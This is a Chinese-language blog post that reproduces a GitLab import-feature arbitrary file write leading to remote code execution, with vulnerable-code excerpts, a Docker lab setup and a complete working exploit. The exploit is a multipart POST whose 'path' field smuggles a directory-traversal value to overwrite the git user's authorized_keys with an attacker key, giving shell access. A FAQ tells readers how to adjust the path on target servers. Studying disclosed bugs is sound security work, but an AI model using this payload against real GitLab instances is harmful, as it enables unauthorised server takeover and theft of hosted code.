0x00前言
近期Hackerone公開了Gitlab的任意文件寫入,導致遠程代碼執行漏洞,實踐一波。ps:漏洞利用前提:需要有gitlab賬戶,擁有import project的權限溫馨提示:利用成功後會
覆蓋掉原git用戶的authorized_keys,在實際生產環境請謹慎嘗試,後果自負!0x01漏洞描述
app/services/projects/gitlab_project_import_service.rb
<code># This service is an adapter used to for the GitLab Import feature, and
# creating a project from a template.
# The latter will under the hood just import an archive supplied by GitLab.
module Projects
class GitlabProjectsImportService
# ...
def execute
FileUtils.mkdir_p(File.dirname(import_upload_path))
FileUtils.copy_entry(file.path, import_upload_path)
Gitlab::ImportExport::ProjectCreator.new(params[:namespace_id],
current_user,
import_upload_path,
params[:path]).execute
end
# ...
def tmp_filename
"#{SecureRandom.hex}_#{params[:path]}"
end
end
end
/<code>
import_upload_path將未過濾的參數params[:path]添加到gitlab上傳目錄,導致存在目錄遍歷,此外由於文件內容沒有限制,最終導致任意內容寫入任意文件。由於默認gitlab創建並啟動了git賬戶,該賬戶默認目錄為/var/opt/gitlab/,修改.ssh/authorized_keys文件為攻擊者的公鑰,即可以git用戶身份成功登錄服務器,從而導致命令執行。
影響版本 :
- GitLab CE and EE 8.9.0 - 9.5.10
- GitLab CE and EE 10.0.0 - 10.1.5
- GitLab CE and EE 10.2.0 - 10.2.5
- GitLab CE and EE 10.3.0 - 10.3.3
0x02漏洞利用復現
1. 環境搭建
利用docker搭建gitlab
<code>docker run -d --name gitlab -p 80:80 -p 443:443 -p 2222:22 gitlab/gitlab-ce:10.2.4-ce.0/<code>
修改配置文件
<code>docker exec -it gitlab /bin/bash
nano /etc/gitlab/gitlab.rb
# 去掉gitlab的註釋並修改對應ip
external_url '192.168.1.100'
#重新載入配置文件
gitlab-ctl reconfigure
# 訪問對應ip,第一次需要設置密碼,並新建用戶
http://192.168.1.100//<code>
攻擊者本地利用ssh-keygen生成公私鑰對(用於攻擊替換和登錄)
2. POC及利用
- 登錄gitlab->創建項目->Import project->GitLab Import->選擇文件
url為:ip+/import/gitlab_project/new?namespace_id=2&path= - 然後選擇前面ssh-keygen生成的公鑰(注意是公鑰)
- 點擊import project 後,burp修改path的值為ssh/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys
數據包如下
<code>POST /import/gitlab_project HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------20787582420424
Content-Length: 1214
Referer: http://192.168.1.100/import/gitlab_project/new?namespace_id=2&path=
Cookie: _gitlab_session=9c5f21dbfe98d90b1d992e1c9907584c; sidebar_collapsed=false
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------20787582420424
Content-Disposition: form-data; name="utf8"
â
-----------------------------20787582420424
Content-Disposition: form-data; name="authenticity_token"
JoWtToPxTJL6RVASaprnR1hRqEGARnbLkA06favQLxQ7Y7YtyqfE9+JsbV/NAwy7XAdTuzgRsxJ/Kl1hH9V6xA==
-----------------------------20787582420424
Content-Disposition: form-data; name="namespace_id"
{:value=>2}
-----------------------------20787582420424
Content-Disposition: form-data; name="path"
ssh/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys
-----------------------------20787582420424
Content-Disposition: form-data; name="namespace_id"
2
-----------------------------20787582420424
Content-Disposition: form-data; name="file"; filename="id_rsa.pub"
Content-Type: application/vnd.ms-publisher
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+McaRvLdnm+u30cACV4ftHJUESNVNV/VNlwm5xST343cFQODjBua5ffpCgDIejiVhyz9BzMmmynN5tnN6JQlx4SwSGkuR3+wzbJ8XKJNHLpOeZ2Xzw+UA9duDinDQHUklFwDmjH7Pywy6kRurIWXTsdupkLrHobEjSjrwEkqvLUnRi1EA/nU5es+kEz6c04jDUrZoGaj5GiI7VYReX+d9Pm524H9KfBpFIZ27yaWs1lR9b+dXjbXnUdysKdWTQcwy1tv+xhEbwF9m/PQajAEPPl95u/qrGPMqT0l08dC6H9o50i9Yn0Yf3t946g4QjGBs+GZgaNoLda8d5U5S8XLz BF@DESKTOP-4UM7GF4
-----------------------------20787582420424--/<code>
4.發送請求後,使用用戶名git以及生成的私鑰登錄gitlab服務器,如下是執行命令的demo
<code>$ id
uid=998(git) gid=998(git) groups=998(git)/<code>
0x03復現失敗的常見問題解答
(1)請先訪問對應ip+/help,查看版本是否屬於有漏洞的版本(2)漏洞原理是:利用任意文件寫入,覆蓋git用戶的ssh登陸authorized_keys。默認git用戶目錄在/var/opt/gitlab/,如果目標服務器安裝gitlab時更改了默認的路徑,則需要適當修改path為對應的用戶目錄。(感謝:泳少)
0x04參考鏈接
https://about.gitlab.com/2018/01/16/gitlab-10-dot-3-dot-4-released/https://hackerone.com/reports/298873
閱讀更多 暗影實驗室 的文章